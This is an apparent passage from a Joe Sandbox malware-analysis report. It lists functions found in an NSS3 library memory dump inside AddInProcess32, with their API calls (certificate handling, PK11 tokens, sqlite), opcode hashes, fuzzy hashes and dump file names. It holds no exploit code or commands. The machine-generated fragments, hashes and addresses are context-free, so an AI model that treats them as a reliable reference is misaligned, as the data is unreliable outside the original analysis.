                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memchrtolower$isspace
                                                                                      • String ID: 0123456789abcdef
                                                                                      • API String ID: 3040594209-1757737011
                                                                                      • Opcode ID: adc7b0a75b31df8d030e05cd6096cb6e598fdf2334b6502dd0fa7fb0c04fae65
                                                                                      • Instruction ID: 6be11d169af0fc6c5de72a901591af7b3688195750f2ebf87e7654264be527b4
                                                                                      • Opcode Fuzzy Hash: adc7b0a75b31df8d030e05cd6096cb6e598fdf2334b6502dd0fa7fb0c04fae65
                                                                                      • Instruction Fuzzy Hash: BD51E370F052599FDB11CF69C8887AE7BB6BF86318F148159E8509BA54E3308D91CBE2
                                                                                      APIs
                                                                                      • PORT_Free_Util.NSS3(?,00000000,?), ref: 6CD2A135
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free_Util
                                                                                      • String ID:
                                                                                      • API String ID: 3239092222-0
                                                                                      • Opcode ID: 9649f340e9034eb3c4d970e0d0d1c683ffecf09da02c2d54f71212efc8b7b094
                                                                                      • Instruction ID: 6aec59d886a4ccc6518a5d7d5be2c864f99502facf1644a306eec408f677512f
                                                                                      • Opcode Fuzzy Hash: 9649f340e9034eb3c4d970e0d0d1c683ffecf09da02c2d54f71212efc8b7b094
                                                                                      • Instruction Fuzzy Hash: A85182B1904706EFDB11DF95CD8099AF7B4FF0435CB10852AEA1897A30D739E964CBA1
                                                                                      APIs
                                                                                      • SECOID_FindOIDTag_Util.NSS3(00000000,00000000,00000000,?), ref: 6CD21D9B
                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD21DCC
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,00000000,?), ref: 6CD21EB6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_FindItem_Tag_Zfree
                                                                                      • String ID:
                                                                                      • API String ID: 2350799567-0
                                                                                      • Opcode ID: 110a2118782e1b590a74a80381d6d6d5d01b9200b5349a58a92c6b8282c38b7c
                                                                                      • Instruction ID: 7579e35426084384396bb5f1df955b32ce289921acf8e7d57736817b3c00743d
                                                                                      • Opcode Fuzzy Hash: 110a2118782e1b590a74a80381d6d6d5d01b9200b5349a58a92c6b8282c38b7c
                                                                                      • Instruction Fuzzy Hash: CE41E272804609EBDF118F65DC00FAB7BB4FF45318F108619FA6546AB0E736E954CB51
                                                                                      APIs
                                                                                      • PORT_ZAlloc_Util.NSS3(?), ref: 6CCDDE05
                                                                                        • Part of subcall function 6CD1CC25: PR_Calloc.NSS3(00000001,00000001,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC41
                                                                                        • Part of subcall function 6CD1CC25: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC56
                                                                                      • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CCDDE30
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000000), ref: 6CCDDE70
                                                                                      • CERT_IsCACert.NSS3(00000000,00000000,00000000), ref: 6CCDDEA4
                                                                                      • CERT_MakeCANickname.NSS3(00000000), ref: 6CCDDEB6
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CCDDEE3
                                                                                      • CERT_DestroyCertArray.NSS3(00000000,00000000), ref: 6CCDDF05
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Cert$Alloc_ArrayCallocCertificateDestroyErrorFreeFree_Item_MakeNicknameTemp
                                                                                      • String ID:
                                                                                      • API String ID: 643571696-0
                                                                                      • Opcode ID: 7970128488d41f7aa9764d8043e6ae69dc60a61996bfdfc1c9a42602c7912ccb
                                                                                      • Instruction ID: 13113093e6e79e0baef941da402afdb6b2296c1f36c4690520aa7143eb2d9050
                                                                                      • Opcode Fuzzy Hash: 7970128488d41f7aa9764d8043e6ae69dc60a61996bfdfc1c9a42602c7912ccb
                                                                                      • Instruction Fuzzy Hash: E0417471D01616ABDB01DFADD98099E7BB8EF05758B21016AE610D3A50FB31EA14CFA1
                                                                                      APIs
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC6490B
                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6CC64915
                                                                                      • sqlite3_value_text.NSS3(?,?,?), ref: 6CC64920
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_value_text
                                                                                      • String ID: %s%.*s"%w"$%s%s$i
                                                                                      • API String ID: 348685305-204303429
                                                                                      • Opcode ID: 8e52d646df3c0a24542f83862bd4c5d4c0af5d2ff07666421645c8b4b9d9e09b
                                                                                      • Instruction ID: af8172922e13fb45e02624a80b47ab99efc217325f0a87d34cf967d4bfef44cd
                                                                                      • Opcode Fuzzy Hash: 8e52d646df3c0a24542f83862bd4c5d4c0af5d2ff07666421645c8b4b9d9e09b
                                                                                      • Instruction Fuzzy Hash: A84192B2900205BBDF10DFA59D81A9E7BB9EF44219F200569E814A3F51FB31C9549B94
                                                                                      APIs
                                                                                        • Part of subcall function 6CD25C97: SECOID_FindOID_Util.NSS3(?,?,?,6CD25CFD,?,00000000,00000000,?,?,?,?,6CD2123E,?), ref: 6CD25CA8
                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CD25D37
                                                                                        • Part of subcall function 6CD0EDE1: memset.VCRUNTIME140(?,00000000,?,?,?,?,?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EE45
                                                                                        • Part of subcall function 6CD0EDE1: PORT_Free_Util.NSS3(?,?,00000000,?,?,?,?,?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EE4D
                                                                                        • Part of subcall function 6CD0EDE1: PR_Lock.NSS3(?,00000000,00001002,?), ref: 6CD0EE6E
                                                                                        • Part of subcall function 6CD0EDE1: PR_Unlock.NSS3(?), ref: 6CD0EEA7
                                                                                        • Part of subcall function 6CD0EDE1: PORT_Free_Util.NSS3(EB2BE856,?,?,?), ref: 6CD0EEC3
                                                                                        • Part of subcall function 6CD0EDE1: PK11_FreeSlot.NSS3(D611683D,00000000,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EECC
                                                                                      • CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,?,?,?,6CD2123E,?), ref: 6CD25D7D
                                                                                      • CERT_DestroyCertificateList.NSS3(?,00000000,00000000,?,?,?,?,6CD2123E,?), ref: 6CD25DA0
                                                                                      • CERT_DestroyCertificate.NSS3(00000000,?,?,00000000,00000000,?,?,?,?,6CD2123E,?), ref: 6CD25DC1
                                                                                      • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6CD25DDF
                                                                                      • CERT_DestroyCertificateList.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6CD25DEE
                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,6CD2123E,?), ref: 6CD25E05
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CertificateDestroy$Util$Free$Free_K11_List$Arena_FindLockSlotUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2278931547-0
                                                                                      • Opcode ID: e3cb6f541838166979d1cb7b11e455177fc4f10df6ad82a37da229b2f2653dbc
                                                                                      • Instruction ID: 6ffa5b441de55d91053398e2b8a65e7617b6ddf1093eddee44ecd6feaae83d86
                                                                                      • Opcode Fuzzy Hash: e3cb6f541838166979d1cb7b11e455177fc4f10df6ad82a37da229b2f2653dbc
                                                                                      • Instruction Fuzzy Hash: D0418C36605702DBEB10DF19C488F86B7B5AF4571CF2541A9DA149BA38F739F844CB90
                                                                                      APIs
                                                                                      • PR_EnterMonitor.NSS3(00000000,00000000,00000000,?,?,?,6CCE85CE,6CD87630,?,00000000,?,6CCE7318,00000000,?,?), ref: 6CCE8C3C
                                                                                      • PR_ExitMonitor.NSS3 ref: 6CCE8D4F
                                                                                        • Part of subcall function 6CCE7DA1: PORT_SetError_Util.NSS3(FFFFE005,00000000,?,6CCE8CA9,00000000), ref: 6CCE7DB1
                                                                                      • PR_ExitMonitor.NSS3 ref: 6CCE8CB4
                                                                                      • PORT_SetError_Util.NSS3(FFFFE890), ref: 6CCE8CBF
                                                                                      • DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6CCE8CDF
                                                                                        • Part of subcall function 6CD157EF: PORT_SetError_Util.NSS3(FFFFE008,?,?), ref: 6CD15869
                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CCE8D2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_Monitor$Exit$Arena_EnterFreeGeneralizedTimeTime_
                                                                                      • String ID:
                                                                                      • API String ID: 2549800120-0
                                                                                      • Opcode ID: 52a16b0e7b288d59c1f5cae4781035414ccdad0d8094d58a5fdc820b4c52e4b6
                                                                                      • Instruction ID: 7aeb2040f29d6522f596b0a02810fcff6b8b46cd964c79a3c26d6af2e57a096d
                                                                                      • Opcode Fuzzy Hash: 52a16b0e7b288d59c1f5cae4781035414ccdad0d8094d58a5fdc820b4c52e4b6
                                                                                      • Instruction Fuzzy Hash: DE311B32506706AFDF218F5AD884C8A37F8EF5B368720056BF91586D50FB31D945CBA0
                                                                                      APIs
                                                                                      • PORT_Realloc_Util.NSS3(6CD075D7,6CD075DA,00000000,00000000,?,?,?,6CD075D7,00000000), ref: 6CD0704B
                                                                                      • memset.VCRUNTIME140(00000001,00000030,6CD075D8,00000000,00000000,?,?,?,6CD075D7,00000000), ref: 6CD07069
                                                                                      • PORT_Free_Util.NSS3(6CD075D7,00000000,00000000,?,?,?,6CD075D7,00000000), ref: 6CD07085
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_Realloc_memset
                                                                                      • String ID: #2
                                                                                      • API String ID: 808361560-2977085715
                                                                                      • Opcode ID: dbfecb9cf1d0f2a641f10f3d164265598c7374d778e4cfb3585d16002f59d0c5
                                                                                      • Instruction ID: b3614a90b9f173b584732800f03728bbc78f57207ccb13d999f4e99a56bc629d
                                                                                      • Opcode Fuzzy Hash: dbfecb9cf1d0f2a641f10f3d164265598c7374d778e4cfb3585d16002f59d0c5
                                                                                      • Instruction Fuzzy Hash: D131B12670C642BADB158F3CD490AADBBB9DF83358B190399D8408FF65E75399068371
                                                                                      APIs
                                                                                      • PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,00000000,00000000,?,00000000,?,?,00000000,?,6CD26BDA,?,00000000,00000000,?), ref: 6CCFCF59
                                                                                        • Part of subcall function 6CD11E42: SECMOD_GetDefaultModuleListLock.NSS3 ref: 6CD11E5C
                                                                                        • Part of subcall function 6CD11E42: PORT_SetError_Util.NSS3(FFFFE09A), ref: 6CD11E6D
                                                                                      • PK11_FreeSlotList.NSS3(?,?,?,?,?,00000000,?,00000000,?,?,00000000,?,6CD26BDA,?,00000000,00000000), ref: 6CCFD01C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_List$DefaultError_FreeLockModuleSlotTokensUtil
                                                                                      • String ID: @
                                                                                      • API String ID: 2525413358-2766056989
                                                                                      • Opcode ID: c70640240dc24276515b2fa719fdd4dfac69db42b882d4408fa8c9af8c159aae
                                                                                      • Instruction ID: 39882e8a512bdbc1dd97f5eab800a0c6538f4d43c49ba2f4b0df63a7e8f83702
                                                                                      • Opcode Fuzzy Hash: c70640240dc24276515b2fa719fdd4dfac69db42b882d4408fa8c9af8c159aae
                                                                                      • Instruction Fuzzy Hash: 42415D75A0421AAFDB50DFA9D8809EEFBF5FF09314B104129E924A7B50E731D902CBA0
                                                                                      APIs
                                                                                        • Part of subcall function 6CD119D2: PR_Lock.NSS3(50DC458D,?,6CD0A74B,6CCF4FEA,EBFFC883,?,6CD0E826,6CCF4FEA,?,?,?,6CCF4FEA,?,?,6CD1180D,6CCF4FEA), ref: 6CD119DB
                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6CD0A8EC
                                                                                        • Part of subcall function 6CD1C68C: PR_Malloc.NSS3(00000001,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6A6
                                                                                        • Part of subcall function 6CD1C68C: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6BA
                                                                                      • PORT_Realloc_Util.NSS3(00000000,00000000), ref: 6CD0A8F4
                                                                                      • PORT_Free_Util.NSS3(00000000,00000000,00000000), ref: 6CD0A935
                                                                                      • PORT_SetError_Util.NSS3(00000000,00000000), ref: 6CD0A92F
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD0A969
                                                                                      • PORT_SetError_Util.NSS3(00000000,000000B3,?,?,00000000,?,0000000C,?,6CCF9FC9,?,?,?,?), ref: 6CD0A985
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ErrorError_Free_$Alloc_LockMallocRealloc_
                                                                                      • String ID:
                                                                                      • API String ID: 2619467957-0
                                                                                      • Opcode ID: 335b221b2062ccf5786b8307cc4f59715469357fd0a959f74a55985d6d0418a4
                                                                                      • Instruction ID: 9ca3642a1768e53e09683035f7b55a9260999242be235c1cae17be1ec9818ae0
                                                                                      • Opcode Fuzzy Hash: 335b221b2062ccf5786b8307cc4f59715469357fd0a959f74a55985d6d0418a4
                                                                                      • Instruction Fuzzy Hash: 5931C831705A16ABC701DFADE880A9E73A8FF45728B510125F818D7E60D734DA558BA1
                                                                                      APIs
                                                                                        • Part of subcall function 6CD13033: PORT_ArenaAlloc_Util.NSS3(00000000,?), ref: 6CD1305A
                                                                                        • Part of subcall function 6CD13033: memcpy.VCRUNTIME140(?,?,?), ref: 6CD13080
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001), ref: 6CD12927
                                                                                        • Part of subcall function 6CD16D95: PORT_FreeArena_Util.NSS3(6CD16FE4,00000000,6CD1700C,j4V'Y,6CD16FF4,6CD16FE8,00000000,?,6CD16FE4,00000000), ref: 6CD16DC4
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001), ref: 6CD1294C
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_$Alloc_ArenaArena_ErrorFreememcpy
                                                                                      • String ID: manufacturer$model$serial$token
                                                                                      • API String ID: 573543171-1906384322
                                                                                      • Opcode ID: d76b404ae9146c17f3c33db98d9d6b3c16b89b3d99107e707913afef9b868448
                                                                                      • Instruction ID: 2a2a4d083a4ee49f2af6c0faf5fcf28d1a8365bf740e0750d04a0875e30f5ff2
                                                                                      • Opcode Fuzzy Hash: d76b404ae9146c17f3c33db98d9d6b3c16b89b3d99107e707913afef9b868448
                                                                                      • Instruction Fuzzy Hash: 2D31B3B2D0414CBFDB10DFB59C45FEEBBACEB05218F54056AD90997B11E7319A098BA0
                                                                                      APIs
                                                                                      • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CCEAE43
                                                                                        • Part of subcall function 6CCFBD0E: PORT_SetError_Util.NSS3(FFFFD003), ref: 6CCFBD2F
                                                                                      • CERT_ExtractPublicKey.NSS3(00000000), ref: 6CCEAE50
                                                                                      • CERT_DestroyCertificate.NSS3(00000000,00000000), ref: 6CCEAE58
                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CCEAE69
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CCEAE7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_$Arena_CertCertificateDestroyExtractFromK11_PrivatePublic
                                                                                      • String ID:
                                                                                      • API String ID: 3841404270-0
                                                                                      • Opcode ID: ceed45938b76c6255b3c3ace538a23c7ac811693694ea2bb846684acf238a2d7
                                                                                      • Instruction ID: 4deb757971e5e1f4c5167f2e822d00ef757ab892a95318be53a9269b3bd61511
                                                                                      • Opcode Fuzzy Hash: ceed45938b76c6255b3c3ace538a23c7ac811693694ea2bb846684acf238a2d7
                                                                                      • Instruction Fuzzy Hash: C931C8B25482006FD7119F65DC80F57BBF8EFCA714F148169E9458AE51F761D8148770
                                                                                      APIs
                                                                                      • PORT_ZAlloc_Util.NSS3(00000140,?,?,6CD336AD,00000000,00000001,?,?,?,?,?,00000003,00000400), ref: 6CD35D94
                                                                                        • Part of subcall function 6CD1CC25: PR_Calloc.NSS3(00000001,00000001,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC41
                                                                                        • Part of subcall function 6CD1CC25: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC56
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,000000EC,00000570,00000400,00000000,?), ref: 6CD35DE0
                                                                                      • PORT_Free_Util.NSS3(00000000,00000400,00000000,?), ref: 6CD35E04
                                                                                        • Part of subcall function 6CD1693A: PR_GetCurrentThread.NSS3(-00000165,00000000,?,6CD1C559,?,00000000,?,6CD1C167,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?), ref: 6CD1693F
                                                                                        • Part of subcall function 6CD1693A: PR_Lock.NSS3(00000000,?,6CD1C559,?,00000000,?,6CD1C167,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?,00000000), ref: 6CD1694C
                                                                                        • Part of subcall function 6CD1693A: PR_Unlock.NSS3(00000000,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?,00000000,?,?,00000000,?,6CCDCBFF,?), ref: 6CD1697D
                                                                                      • PORT_Strdup_Util.NSS3(?,00000400,00000000,?), ref: 6CD35E19
                                                                                      • PORT_Strdup_Util.NSS3(?,00000400,00000000,?), ref: 6CD35E2D
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000400,00000000,?), ref: 6CD35E7E
                                                                                      • PK11_GenerateRandom.NSS3(0000007B,0000001E,00000400,00000000,?), ref: 6CD35E98
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Strdup_$Alloc_CallocCopyCurrentErrorFree_GenerateItem_K11_LockRandomThreadUnlock_getpid
                                                                                      • String ID:
                                                                                      • API String ID: 3314534732-0
                                                                                      • Opcode ID: 222b74b5145ca9b9999d3724b2a1bf03adce521112c2fe1f936b50d47b75416f
                                                                                      • Instruction ID: 6c83aa728df226ac3e154124a74d80fe71c5455d991e481faf63b1e7e9e71ae6
                                                                                      • Opcode Fuzzy Hash: 222b74b5145ca9b9999d3724b2a1bf03adce521112c2fe1f936b50d47b75416f
                                                                                      • Instruction Fuzzy Hash: 4D313A3110D711DAEB018F28D884B9233E8AF4231DF245169EC1D9FAB6E776D488C7B4
                                                                                      APIs
                                                                                        • Part of subcall function 6CCDA189: PR_Calloc.NSS3(00000001,00000144,774CDF20,00000000,?,6CCD9F54,?,6CCC80C2,?,?,?,6CCCFD4C,00000000,00000001,00000000,00000000), ref: 6CCDA1A8
                                                                                        • Part of subcall function 6CCDA189: _PR_MD_NEW_LOCK.NSS3(00000040,774CDF20,00000000,?,6CCD9F54,?,6CCC80C2,?,?,?,6CCCFD4C,00000000,00000001,00000000,00000000), ref: 6CCDA1D6
                                                                                      • PR_Lock.NSS3 ref: 6CCDA902
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • PR_Unlock.NSS3 ref: 6CCDA949
                                                                                      • PR_Calloc.NSS3(00000001,0000002C), ref: 6CCDA952
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CCDA967
                                                                                      • PR_NewCondVar.NSS3 ref: 6CCDA992
                                                                                        • Part of subcall function 6CCD96AE: PR_Calloc.NSS3(00000001,00000084,00000000,?,6CCDA827), ref: 6CCD96B9
                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6CCDA9D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
